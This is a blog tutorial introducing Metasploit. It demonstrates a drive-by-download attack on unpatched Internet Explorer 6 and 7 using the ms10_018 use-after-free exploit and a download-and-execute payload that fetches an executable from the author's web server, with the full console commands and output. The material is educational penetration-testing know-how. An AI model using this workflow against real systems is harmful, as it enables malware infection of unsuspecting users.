Brief introduction to Metasploit

As a part of increasing IT-infrastructure security, penetration testing is one of the most valuable tools. Of course, system updates, using firewalls, IDS/IPS, right ACL and other methods are very efficient, but you can't be 100% assured that everything is fine. Security is a battle between defenders and attackers, and usually attackers are one step ahead in this battle.

To be a good security professional, you have to know how attackers work, which tools and methods they are using, you have to be an attacker (of course, white-hat) - embrace Dark Side, but not be dominated by it and stay with Light Side.

So, the Metasploit is one of must-be-known tool for every security professional:
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information are provided for legal security research and testing purposes only.
There are many information about Metasploit in the Internet, and I strongly recommend to read  Metasploit Unleashed. Here I only want to briefly show its usage.

Download the Metasploit Framework: http://www.metasploit.com/framework/download/

No additional packages are required. Ruby and RoR are included in the installer.

The main tool which you will use - the console: msfconsole. Please notice that if you've selected autoupdate from SVN, the console launch time can be pretty long (autoupdate runs during starting up the console).

The main principle of Metasploit usage:
  • select exploit which will be used to breach the system;
  • select payload which will be executed after the breaking in;
  • set up the additional parameters if needed and exploit the target.
Exploitation can be direct (e.g., using SMB vulnerability and attacking system via network) and indirect (e.g., Metasploit generates the "site" and show you a link, after that you have to somehow bring target to open the link). Direct exploitations are widely discussed in the Internet, and I'll show the indirect exploitation.

We will use windows/browser/ms10_018_ie_behaviors exploit and windows/download_exec payload. Before that, please make ready the Windows executable and upload it to the webserver. I would like to recommend to make executable via cross-compilation and use SimpleHTTPServer for distributing it.

Example executable source code:

#include <windows.h>
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow)
{
  MessageBoxW(0, L"You're pwned!\n", L"MinGW app", MB_ICONEXCLAMATION);

  return 0;
}

Compile it and start a web server:

$ i586-mingw32msvc-cc msgbox.c -o msgbox.exe -Wl,-subsystem,windows
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

Now it's time to start msfconsole:

$ msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 609 exploits - 306 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r10702 updated today (2010.10.16)

msf
>

You've got a MSF prompt. Let's get information about the required exploit and payload:

msf > info windows/browser/ms10_018_ie_behaviors

       Name: Internet Explorer DHTML Behaviors Use After Free
    Version: 9787
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  unknown
  Trancer <mtrancer@gmail.com
>
  Nanika
  jduck
<jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
  1   IE 6 SP0-SP2 (onclick)
  2   IE 7.0 (marquee)

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1024
  Avoid: 6 characters

Description:
  This module exploits a use-after-free vulnerability within the DHTML
  behaviors functionality of Microsoft Internet Explorer versions 6
  and 7. This bug was discovered being used in-the-wild and was
  previously known as the "iepeers" vulnerability. The name comes from
  Microsoft's suggested workaround to block access to the iepeers.dll
  file. According to Nico Waisman, "The bug itself is when trying to
  persist an object using the setAttribute, which end up calling
  VariantChangeTypeEx with both the source and the destination being
  the same variant. So if you send as a variant an IDISPATCH the
  algorithm will try to do a VariantClear of the destination before
  using it. This will end up on a call to PlainRelease which deref the
  reference and clean the object." NOTE: Internet Explorer 8 and
  Internet Explorer 5 are not affected.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-0806
  http://www.osvdb.org/62810
  http://www.securityfocus.com/bid/38615
  http://www.microsoft.com/technet/security/advisory/981374.mspx
  http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
  http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
  http://www.microsoft.com/technet/security/bulletin/MS10-018.mspx

msf > info windows/download_exec

       Name: Windows Executable Download and Execute
    Version: 9488
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 340
       Rank: Normal

Provided by:
  lion
<lion@cnhonker.com>
  pita <pita@mail.com>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
URL                    yes       The pre-encoded URL to the executable

Description:
  Download an EXE from an HTTP URL and execute it

As you can see the exploit target are unpatched IE 6 and IE 7.

It's time to get some action:

msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors)
> set payload windows/download_exec
payload => windows/download_exec
msf exploit(ms10_018_ie_behaviors)
> set URL "http://192.168.1.4:8000/msgbox.exe"
URL => http://192.168.1.4:8000/msgbox.exe
msf exploit(ms10_018_ie_behaviors)
> exploit
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/minSVGSK
[*]  Local IP: http://192.168.1.4:8080/minSVGSK
[*] Server started.

Now let's open this URL in unpatched Windows XP. After some hidden actions the required application starts without any confirmations:


This is classical drive-by-download malware infection.

I hope that this article gives you the initial points to increase your knowledge in security. MSF is a great tool, and every security researcher have to know it. There are many topics hold undiscovered, but I'm sure that you can find all the required information in the Internet or by examining MSF source code. Good luck, and let the Force be with you!

Comments

Popular posts from this blog

Web application framework comparison by memory consumption

Trac Ticket Workflow

Shellcode detection using libemu